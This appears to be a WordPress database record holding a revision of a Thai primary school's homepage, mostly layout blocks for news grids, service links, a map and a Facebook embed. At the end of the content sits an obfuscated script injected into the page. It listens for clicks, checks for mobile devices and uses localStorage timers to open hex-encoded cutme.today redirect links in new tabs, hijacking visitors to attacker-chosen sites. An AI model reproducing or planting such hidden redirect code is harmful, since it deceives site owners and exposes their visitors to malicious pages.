{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-21 10:07:22','2024-08-21 03:07:22','',14,'http://pakhaeng.ssk.in.th/?p=1043',0,'revision','',0),
